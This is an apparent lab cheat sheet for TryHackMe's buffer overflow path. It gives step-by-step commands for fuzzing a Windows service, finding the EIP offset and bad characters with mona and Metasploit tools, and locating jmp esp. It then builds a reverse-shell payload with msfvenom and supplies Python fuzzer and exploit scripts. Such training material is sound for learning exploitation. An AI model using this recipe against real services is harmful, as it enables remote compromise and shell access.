point n shoot
last stop for buffer overflow
ref: TRY HACK ME BOF PATH connect to remote windows box
How to RDP into windows ?
Exploitation
Step 1: Start immunity with admin permissions. Step 2: Attach or open the desired application and put it into running state
binary opens in a paused state ;
How to set working path in Immunity Debugger ?
On Attacker Machine aka Kali
Step 1: Do Port Scan and Identify Target Port Step 2: nc ip port and check out the command options ; modify fuzzer script prefix accordingly Step 3: run the fuzzer ; wait for it to give you the crashing bytes add 400 to the no. python fuzzer.py for example program crached at 200 bytes Step 4: usr share metasploit tools exploit pattern create -l 600
/usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 600
Step 5: modify exploit py and put the pattern in overflow variable ; run the script ; observe the EIP
!mona findmsp -distance 600
basically the length of pattern you created this will output you the offset you can double check it with follwing :: └─$ /usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -q 76413176 ^^ value of eip after crash with pattern Step 6: Confirm Offset by setting offset value in exploit py sending length of A follwed by retn or eip value as “BBBB” pbserve eip 42424242 if true the offset is correct Step 7: Find Bad Chars [ the fastest n easiest way ] generate a byte array excluding null byte null byte is always a bad char
!mona bytearray -b "\x00"
use python script to generate a badchar on attacking machine as well Check appendix now send the byte array in payload section of python exploit ... crash and then check for badchars crach and check the value of esp = [copy this value] and run this command to check bad chars
!mona compare -f C:\mona\oscp\bytearray.bin -a <addressof esp>
!mona compare -f C:\mona\oscp\bytearray.bin -a
0188FA30 esp = 0188FA30 only keep the first char if badchars are in consecutive sequence . rinse n repeat update the payload variable and remove the new badchars from the py exploit create new badcahr array using mona module again
!mona bytearray -b “\x00\x23\x3c\x83\xba”
rerun the exploit -→ crash the app --> and again check the esp and re run the follwing
!mona compare -f C:\mona\oscp\bytearray.bin -a <addressof esp>
!mona compare -f C:\mona\oscp\bytearray.bin -a
0193FA30 Find jmp esp after crashing or before crashing [does not matter ] mention all your badchars after -cpb paramter
!mona jmp -r esp -cpb "\x00\x23\x3c\x83\xba"
^^^^here goes all your badchars keep a address of jmp esp -→ save it in reverse order in retn / eip value in exploit .py generate your shell code using msfvenom
msfvenom -p windows/shell_reverse_tcp LHOST=YOUR_IP LPORT=4444 EXITFUNC=thread -b "\x00morehere" -f c
paste the output in payload section like payload = ("adfadfa" “adadfa” “afdawfda” “awdfawdf”) set nops somewhere between 12-16-20 nop = “\x90” * 16 Fuzzer python3 script ---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x--- #!/usr/bin/env python3 import socket, time, sys ip = "MACHINE_IP" port = 1337 timeout = 5 prefix = "OVERFLOW1 " string = prefix + "A" * 100 while True: try: with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s: s.settimeout(timeout) s.connect((ip, port)) s.recv(1024) print("Fuzzing with {} bytes".format(len(string) - len(prefix))) s.send(bytes(string, "latin-1")) s.recv(1024) except: print("Fuzzing crashed at {} bytes".format(len(string) - len(prefix))) sys.exit(0) string += 100 * "A" time.sleep(1) ---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x--- Exploit.py ---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x--- #!/usr/bin/env python3 import socket ip = "MACHINE_IP" port = 1337 prefix = "OVERFLOW1 " offset = 0 #this is your junk overflow = "A" * offset #this is eip enter it in reverse retn = "" #this is nop sledge padding = "" #here goes your shellcode in c format payload = "" #remaining bytes from total postfix = "" buffer = prefix + overflow + retn + padding + payload + postfix s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) try: s.connect((ip, port)) print("Sending evil buffer...") s.send(bytes(buffer + "\r\n", "latin-1")) print("Done!") except: print("Could not connect.") ---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x--- python badchar create ---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x--- for x in range(1, 256): print("\\x" + "{:02x}".format(x), end='') print() ---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---x---
Last updated
Was this helpful?